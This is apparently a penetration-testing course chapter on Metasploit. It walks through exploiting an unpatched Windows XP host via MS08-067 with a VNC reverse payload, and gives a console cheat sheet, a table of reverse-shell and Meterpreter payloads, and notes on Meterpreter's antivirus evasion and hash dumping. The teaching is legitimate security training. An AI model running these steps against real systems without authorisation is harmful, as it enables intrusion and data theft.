Metasploit

In 2004, at Defcon 12, HD Moore and spoonm rocked the world when they gave a talk titled “Metasploit: Hacking Like in the Movies”. This presentation focused on “exploit frameworks”. An exploit framework is formal structure for developing and launching exploits. Frameworks assist the development process by providing organization and guidelines for how the various pieces are assembled and interact with each other.

Metasploit actually started out as a network game, but its full potential was realized when it was transformed into a full-fledged exploit tool. Metasploit contains a suite of tools including some great anti-forensics stuff; however, the project is probably best known for the Metasploit Framework component.

Before the release of Metasploit, security researches had two main choises: they could develop custom code by piecing together various exploits and payloads or they could invest in one of the commercially available exploit frameworks, CORE Impact or ImunitySec’s CANVAS. Both Impact and CANVAS were great choices and highly successful in their own right. Unfortunately, the cost to license and use of these products meant many security researches didn’t have access to them.

Metasploit was different from everything else because for the first time hackers and penetration testers had access to a truly open source exploit framework. This mean that for the first time everyone could access, collaborate, develop and share exploits for free. It also meant that exploits could be developed in an almost factory-like assembly line approach. The assembly line approach allowed hackers and penetration testers to build exploits based on their own needs.

Metasploit allows you to select the target and choose from a wide variety of payloads. The payloads are interchangeable and not tied to a specific exploit. A payload is the “Additional functionality” or change in behaviour that you want to accomplish on the target machine. It’s the answer to the question: “What do I want to do now that I have control of the machine?” Metasploit’s most popular payloads include adding new users, opening backdoors and installing new software onto a target machine. The full list of Metasploit payloads will be covered shortly.

Before we begin covering the details of how to use Metasploit, it’s important to understand the distinction between Metasploit and a vulnerability scanner. In most instances, when we use a vulnerability scanner, the scanner will only check to see if a system is vulnerable. This occurs in a very passive way with little chance of any unintentional damage or disruption to the target. Metasploit and other frameworks are exploitation tools. These tools don’t perform test; these tools are used to complete the actual exploitation of the target. Vulnerability scanners look for and report potential weaknesses. Metasploit attempts to actually exploit the systems it scans. Make sure you understand this.

In 2009, Rapid 7 purchased Metasploit. HD Moore spent a considerable amount of time putting people at ease and reassuring everyone that Metasploit would remain free. Although several great commercial products have been released including Metasploit Express and Metasploit Pro, HD has been true to his word and the original Metasploit project remains free. In fact, the purchase of Metasploit by Rapid 7 has been a huge boost to the Metasploit project. The open source project is clearly benefitting from the commercial tool push with additional full-time developers and staff. The rate at which new exploits and functionality is being added is staggering. We’ll focus on the basics here, but you’ll want to stay on top of the latest developments going forward.

Metasploit can be downloaded for free by clicking on the Framework link located at http://www.metasploit.com. If you’re using BlackArch, Metasploit is already installed for you. There are several ways to interact with Metasploit, but this course will focus on using the menu-diven, non-GUI text-based system called the Msfconsole. Once you understand the basics, the Msfconsole is fast, friendly, intuitive and easy to use. When possible, you should avoid the Msfweb or Msfgui versions especifically when first learaning.

We can access the Msfconsole by opening a terminal window and entering:

msfconsole

Starting the Msfconsole takes between 10 and 30 seconds, so don’t panic if nothing happens for a few moments. Eventually Metasploit will start by presenting you with a welcome banner and a “msf5 >” command prompt. There are several different Metasploit banners that are rotated and displayed at random, so if your screen looks different from the Metasploit screenhost posted below, it’s normal. The important thing is that you get the “msf5 >” console. The initial Metasploit screen is shown in the following image.

Now that Metasploit is running, let’s begin exploring the awesomeness of this tool. To use Metasploit a target must be identified, and the exploit must be selected, a payload needs to be picked and the exploit itself must be launched. We’ll review the details of each of these in just a few moments but before that, let’s review the basics of Metasploit terminology. As mentioned earlier, an exploit is a prepackaged collection of code that gets sent to a remote system. This code causes some atypical behaviour on the target system that allows us to execute a payload. Recall that a payload is also a small snippet of code that is used to perform some task like installing new software, creating new users or opening backdoors to the system.

Exploits are weaknesses that allow the attacker to execute remote code (payloads) on the target system. Payloads are the additional software or functionality that we install on the target system once the exploit has been successfully executed.

Now that we’ve an understanding of how to access and start the Msfconsole and a solid understanding of the terminology used, let’s examine how we can use Metasploit. When first hearing about and using Metasploit, a common mistake of would-be hackers and penetration testers is the lack of organization and thoughtfulness. Remember, Metasploit is like a scalpel, not a hatchet. Or maybe more appropriately, Metasploit is like a Barret M107 sniper rifle, not a M60 machine gun. Most newcomers are overwhelmed by the sheer number of exploits and payloads; and usually get lost trying to find appropriate exploits. They spend their time blindly throwing every exploit against a target and hoping that something sticks. Later in this topic, we’ll examine a tool that works in this manner but for now we need to be a little more refined.

Rather than blindly spraying exploits to a target, we need to find a way to match up known system vulnerabilities with the prepackaged exploits in Metasploit. Once you’ve learned this simple process, owning a vulnerable target becomes a cinch. To correlate a target’s vulnerabilities with Metasploit’s exploits, we need to review our findings from the previous step. We’ll start this process by focusing on the Nessus output. Recall that Nessus is a vulnerability scanner and provides us with a list of known weaknesses or missing patches. When reviewing the Nessus output, you should make notes of any findings but pay special attention to the vulnerabilities labeled as “High”. Many “High” Nessus vulnerabilities, especially missing Microsoft patches, correlate directly with Metasploit exploits.

Assume that during your penetration test you uncovered a new target at IP address 192.168.1.8. Running Nmap tells you that your new target is a Windows XP machine with Service Pack 3 installed. Continuing on with step 2, we run Nessus against the target, and the Nessus report returns two “High” findings.

It’s possible to drill down into each of the “High” findings to get the specific information from Nessus. Double clicking on the first “High” finding reveals the source of this issue is a missing patch. Specifically, Microsoft MS08-067 has not been installed on the target machine. Clicking on the second “High” vulnerability discovered by Nessus reveals another missing Microsoft patch. This vulnerability is the result of missing Microsoft patch MS08-001.

At this point, we know our target has two missing patches. Both of these patches are labeled as “High” and the descriptions that Nessus provides for both missing patches mention “remote code execution”. As an attacker your heartbeat should be racing a little at this point, because the chances are very good that Metasploit will be able to exploit the target for us.

Next we need to head over to Metasploit and look for any exploits pertaining to MS08-067 or MS09-001. Once we’ve started Metasploit, we can use the “search” command to locate any exploits related to our Nessus findings. To accomplish this, we issue the “search” command followed by the missing path number. For example, at the “msf5 >” prompt you’d type:

msf5 > search ms08-067

Once the command is completed, make detailed notes on the findings and search for any other missing patches. Metasploit will search through its information and return any relevant information it finds. The following image shows the output of search for MS08-067 and MS09-001 within Metasploit.

Let’s review its output:

  • We started by issuing the “search” command followed by the specific missing patch that Nessus discovered
  • After searching, Metasploit found a matching exploit and provided us with several pieces of information about the exploit:
    • First, it provided us with a name and location; “exploit/windows/smb/ms08_067_netapi
    • Then, Metasploit provided us with a “Rank”

It’s important to pay close attention to the exploit rank. This information provides details about how dependable the exploit is (how often the exploit is successful) as well as how likely the exploit is to cause instability or crashes on the target system. Numerically, the higher an exploit is ranked, the more likely it’s to succeed and the less likely it’s to cause disruptions on the target system. Metasploit uses seven ratins to rank each exploit.

  1. Manual
  2. Low
  3. Average
  4. Normal
  5. Good
  6. Great
  7. Excellent

The metasploit “search” feature can also be used to locate non-Microsoft exploits. Nessus reports will often include a CVE or BID number to reference critical vulnerabilities. If you’re unable to locate a missing MS path or you’re conducting a penetration test against a non-Microsoft product, be sure to search for matching exploits by CVE or BID numbers! Look for these in your Nessus scan report.

You can find more information and a formal definition of the ranking methodology on the Metasploit.com website. Finally, the Metasploit search feature presents us with a brief description of the exploit providing us with additional details about the attack. When all other things are held equal, you should choose exploits with a higher rank, as they’re less likely to disrupt the normal functioning of your target.

Now that you understand how to match up vulnerabilities in Nessus with exploits in Metasploit and you’ve the ability to choose between two or more Metasploit exploits, we’re ready to unleash the full power of Metasploit on our target.

Continuing with our example, we’ll use the MS08-067 because it has a higher ranking. To run Metasploit, we need to provide the framework with a series of commands. Because Metasploit is already running and we’ve already found our exploit we continue by issuing the “use” command in the “msf5 >” terminal to set the desired exploit.

msf> use exploit/windows/smb/ms08_067_netapi

This command tells Metasploit to use the exploit that Nessus identified. Once we’ve the exploit loaded, we need to view the available payloads. This is accomplished by entering the “show payloads” in the “msf5 >” terminal.

There are many, many payloads to choose from. A full examination of the different payloads is outside the scope of this course. There a Beginners to Advanced Metasploit course. For this example, we’ll install VNC on the target machine and then have that machine connect back to us. If you’re unfamiliar with VNC, it’s remote control PC software that allows a user to connect to a remote machine, review the remote machine and control the mouse and keyboard as if you were physically sitting at that machine. It works much the same as Remote Desktop or a Terminal Server.

It’s important to note that the VNC software ain’t currently installed on the target machine. Remember that some exploits give us the ability to install software on our target machine. In this example, we’re sending an exploit to our target machine. If successfully connected, the exploit will call the “install vnc” payload and remotely install the software on the victim machine without any user interaction.

Different payloads will require different additional options to be set. If you fail to set the required options for a given payload, your exploit will fail. There are few things worse than getting this far and failing to set an option. Be sure to watch this step closely. To view the available options, issue the “show options” in the “msf5 >” terminal:

msf> show options

After issuing the show options command, we are presented with a series of choices that are specific to the payload we’ve chosen. When using the “windows/vncinject/reverse_tcp” payload, we see that there are two options that need to be set because they’re missing any default information. The first is “RHOST” and the second is “LHOST”. RHOST is the IP address of the remote host and LHOST is the IP address you’re attacking from. To set these options, we issue the “set option_name” command in the “msf5 >” terminal:

msf> set RHOST 192.168.1.8
msf> set LHOST 192.168.1.5

Now that you’ve required options set, it’s usually a good idea at this point to reissue the “show options” command to ensure you’re not missing any information.

msf5 > show options

Once you’re sure you’ve entered all the information correctly, you’re ready to launch your exploit. To send your exploit to the target machine, simply type “exploit” into the “msf5 >” terminal:

msf5> exploit

Now sit back and watch as the magic happens. To truly appreciate the beauty and complexity of what’s going on here, you need to build your understanding of buffer overflows and exploitation. This is something that is highly encouraged when you finish the basics covered in this course. Metasploit gives you the ability to stand on the shoulders of giants and the power to launch incredibly complex attacks with just a few commands. You should revel in the moment and enjoy the victory of conquering your target, but you should also commit yourself to learning even more. Commit yourself to really understanding exploitation.

After typing “exploit” Metasploit will go off and its thing, sending exploits and payloads to the target. If you set up everything correctly, after a few seconds you’ll be presented with a screen belonging to your victim machine. Because our payload in this example was a VNC install, you’ll have the ability to view and interacti with the target machine as if you were physically sitting in front of it. It’s hard not to be impressed and even a little bewildered the first time you see (or complete) this exploit in real time.

Below you’ll find a cheat sheet of the steps required to run Metasploit against a target machine.

  • Start Metasploit:
    • Open a terminal and issue the following command: msfconsole
    • Issue the “search” command to search for exploits: msf5 > search missing_path_number
    • Issue the “use” command to select the desired exploit: msf5 > use exploit_name_and_path_as_shown_before
    • Issue the “show payloads” command to show available payloads: msf5 > show payloads
    • Issue the “set” command to select payload msf5 > set payload path_to_payload_as_shown_before
    • Issue “show options” to view any options needing to be filled out before exploiting the target msf5 > show options
    • Issue the “set” command for any options listed in the previous step msf5 > set option_name desired_option_value
    • Issue “exploit” to launch exploit against our target msf5 > exploit

Now that you’ve a basic understanding of how to use Metasploit, it’s important to review a few more of the basic payloads available to you. Although the VNC inject is incredibly cool and great for impressing friends, relatives and coworkers, it’s rearely used in an actual PT. In most penetration testes, hackers prefer a simple shell allowing remote access and control of the target machine. The following is a list of some basic payloads. Please refer to the Metasploit documentation for a complete list. Remember, one of the powers of Metasploit is the ability to mix and match exploits and payloads. This provides a penetration tester with an incredible amount of flexibility, allowing the functionality of metasploit to change depending on the desired outcome. It’s important that you become familiar with the various payloads available to you.

Metasploit payload Payload description
windows/adduser Create a new user in the local administrator group on the target machine
windows/exec Execute a Windows binary (.exe) on the target machine
windows/shell_bind_tcp Open a command shell on the target machine and wait for a connection
windows/shell_reverse_tcp Target machine connects back to the attacker and opens a command shell (on the target)
windows/meterpreter/bind_tcp Target machine install the Meterpreter and waits for a connection
windows/meterpreter/reverse_tcp Installs Meterpreter on the target machine then creates a connection back to the attacker
windows/vncinject/bind_tcp Installs VNC on the target machine and waits for a connection
windows/vncinject/reverse_tcp Installs VNC on the target machine and sends VNC connection back to the target

Many of these same payloads exist for Linux, BSD, OSX and other operating systems. Again, you can find the fully details by reviewing the Metasploit documentation closely. One source of confusion for many people is the difference between similar payloads like “windows/meterpreter/bind_tcp” and “windows/meterpreter/reverse_tcp”. The keyword that causes the confusion here is “reverse”. There’s a simple yet important difference between the two payloads and knowing when to use each will often mean the difference between an exploit’s success or failure. The key difference between these attacks is the direction of the connection after the exploit has been delivered.

In a “bind” payload, we’re both sending the exploit and making a connection to the target from the attacking machine. In this instance, the attacker sends an exploit to the target and the target waits pasively for a connection to come in. After sending the exploit, the attacker’s machine connects to the target.

In a “reverse” payload, the attacking machine sends the exploit but forces the target machine to connect back to the attacker. In this type of attack, rather than passively waiting for an incoming connection on a specified port or service, the target machine actively makes a connection back to the attacker. The next image should make this concept clearer.

The last Metasploit topic to discuss is the Meterpreter. The Meterpreter is a powerful and flexible tool that you’ll need to learn to control if you’re going to master the art of Metasploit. The Meta-Interpreter, or Meterpreter is a payload in Metasploit that gives attackers a powerful command shell that can be used to interact with their target.

Another big advantage of the Meterpreter is the fact that it runs entirely in memory and never utilizes the hard drive. This tactic provides a layer of stealth that helps it evade many anti-virus systems and confounds some forensic tools.

The meterpreter functions in a manner similar to Windows cmd.exe or the Linux /bin/sh command. Once installed on the victim machine, it allows the attacker to interact with and execute commands on the target as if the attackers were sitting at the local machine. It’s very important to understand that the Meterpreter wil run with the privileges associated with the program that was exploited. For example, assume that our favourite Network Admin Ben Owned, was disregarded all common sense and is running his IRC program as a “root” (the Linux equivalent of the Windows “Administrator” account). Unfortunately for Ben, his system is out-of-date, and during a recent penetration test the attacker was able to exploit Ben’s IRC program as the root account, and because the IRC program was exploited by Metasploit, the Meterpreter is now able to function with all the privileges and rights of the “root” account! This is one example in a long list of reasons why it’s important to run all your program with the most restrictive privileges possible and avoid running anything as root or administrator.

Another reason for using the Meterpreter over a traditional cmd or Linux shell stems from the fact that starting either of these on a target machine often starts a new process that can be detected by a keen user or wily administrator. This means that the attacker raises his or her visibility and chances of detection while interacting with the target machine. Furthermore, both the cmd.exec and /bin/sh provide a limited number of tools that can be accessed. In contrast, the Meterpreter was built from the ground up to be used as sort of “hacker’s cmd” with the ability to access and control the most popular tools and functions needed during a penetration test.

The Meterpreter has many great features that are built in by default. Basic functions include the “migrate” command, which is useful for moving the server to another process. Migrating the Meterpreter server to another process is important in case the vulnerable service you attacked is shut down or stopped. Another useful function is the “cat” command, which can be used to display local file contents on the screen. This is useful for reviewing various files on the target. The “download” command allows you to pull a file or directory from the target machine, making a local copy on the attacker’s machine. The “upload” command can be used to move files from the attacker’s machine to the target machine. The “edit” command can be used to make changhes to simple files. The “execute” command can be used to issue a command and have it run on the remote machine, whereas “kill” can be used to stop a process. The following commands are also useful and provide the exact same function as they do on a normal Linux machine: “cd”, “ls”, “ps”, “shutdown”, “mkdir”, “pwd” and “ifconfig”.

Some of the most advanced features include the ability to extract password hases through the SAM Juicer tool, the ability to interact with a ruby shell, the ability to load and execute arbitrary DLLs on the target and even the ability to lock out the local keyboard and mouse.

As you can see, gaining access to a Meterpreter shell is one of the most powerful, flexible and stealthy ways that an attacker can interact with a target. It’s well worth your time to learn how to use this handy tool.